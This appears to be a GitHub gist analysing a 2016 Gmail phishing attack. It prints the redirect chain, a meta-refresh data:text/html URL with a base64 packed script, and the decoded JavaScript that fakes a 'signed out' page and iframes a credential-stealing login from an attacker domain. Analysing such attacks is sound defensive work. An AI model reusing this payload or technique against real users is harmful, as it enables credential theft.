Skip to content

Instantly share code, notes, and snippets.

@maksadbek

maksadbek/attack.md

Forked from timruffles/attack.md
Created March 29, 2019 15:51
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save maksadbek/2e3b851971c688f955cf4fcce5a81d1f to your computer and use it in GitHub Desktop.
Save maksadbek/2e3b851971c688f955cf4fcce5a81d1f to your computer and use it in GitHub Desktop.
Download ZIP
Chrome/Gmail attack received 11/03/2016. Not sure if the Chrome meta refresh + data:text,html technique is novel.
Raw
attack.md

The following attack will display a "you've been signed out" page for GMail, and attempt to steal your account credentials.

DO NOT PUT ANY ACCOUNT CREDENTIALS INTO ANY TABS CREATED AFTER VISITING THESE LINKS :)

I received an email in my GMail inbox with a fake attachment image, styled to look like the real GMail attachment UI:

fake

This linked to a page that ended up displaying a fake "you've been signed out" link, via the data:text/html... URL feature of Chrome:

hijack

The hijack page is a fully functional version of Google page, including animation, and is setup to steal passwords:

page.

A little more detail

The fake attachment image linked to http://x5.to/A78

ƒ curl -vvvv http://x5.to/A78
*   Trying 112.78.125.184...
* Connected to x5.to (112.78.125.184) port 80 (#0)
> GET /A78 HTTP/1.1
> Host: x5.to
> User-Agent: curl/7.43.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Date: Fri, 11 Mar 2016 11:38:08 GMT
< Server: Apache/2.2.31
< Location: http://bowlanreedesntal.top/services/aboutus.htm

The 301'd link uses the meta refresh tag to setup the data/url page, using a base64'd HTML document, again using a data/text:html URL:

ƒ curl http://bowlanreedesntal.top/services/aboutus.htm
<meta http-equiv="Refresh" content="0; url=data:text/html,https://accounts.google.com/ServiceLogin?service=mail                                                                                                                                                                                                                                    <script src=data:text/html;base64,ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7d2hpbGUoYy0tKXtpZihrW2NdKXtwPXAucmVwbGFj
ZShuZXcgUmVnRXhwKCdcXGInK2MrJ1xcYicsJ2cnKSxrW2NdKX19cmV0dXJuIHB9KCczLjIuMTg9
IjE3IDE2IDE5IDIwIDIyIjsyMXsoMTUoKXsxNCAxPTMuMi45KFwnMVwnKTsxLjg9XCc3LzEwLTRc
JzsxLjExPVwnMTMgNFwnOzEuMjM9XCdcJzsyLjI0KFwnMzZcJylbMF0uMzUoMSl9KCkpfTM3KDM4
KXt9My4yLjMzLjMyPSI8NiAyNz1cXCIyNjovLzI1LjI4LzI5LzMxLjMwXFwiIDM5PVxcIjQwOiAw
OzM0OiA1JTsxMjo1JVxcIj48LzY+IjsnLDEwLDQxLCd8bGlua3xkb2N1bWVudHx3aW5kb3d8aWNv
bnwxMDB8aWZyYW1lfGltYWdlfHR5cGV8Y3JlYXRlRWxlbWVudHx4fHJlbHxoZWlnaHR8c2hvcnRj
dXR8dmFyfGZ1bmN0aW9ufGhhdmV8WW91fHRpdGxlfGJlZW58U2lnbmVkfHRyeXxvdXR8aHJlZnxn
ZXRFbGVtZW50c0J5VGFnTmFtZXxib3dsYW5yZWVkZXNudGFsfGh0dHB8c3JjfHRvcHxzZXJ2aWNl
c3xodG1sfGNvbnRhY3R1c3xvdXRlckhUTUx8Ym9keXx3aWR0aHxhcHBlbmRDaGlsZHxoZWFkfGNh
dGNofGV8c3R5bGV8Ym9yZGVyJy5zcGxpdCgnfCcpKSkK></script>"

That base64'd HTML decodes to packed JS, which depacks to:

window.document.title = "You have been Signed out";
try {
    (function() {
        var link = window.document.createElement('link');
        link.type = 'image/x-icon';
        link.rel = 'shortcut icon';
        link.href = '';
        document.getElementsByTagName('head')[0].appendChild(link)
    }())
} catch (e) {}
window.document.body.outerHTML = "<iframe src=\"http://bowlanreedesntal.top/services/contactus.html\" style=\"border: 0;width: 100%;height:100%\"></iframe>";

Which gives us the final result, a page with the title "You have been Signed out" and the fake login in an iframe.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment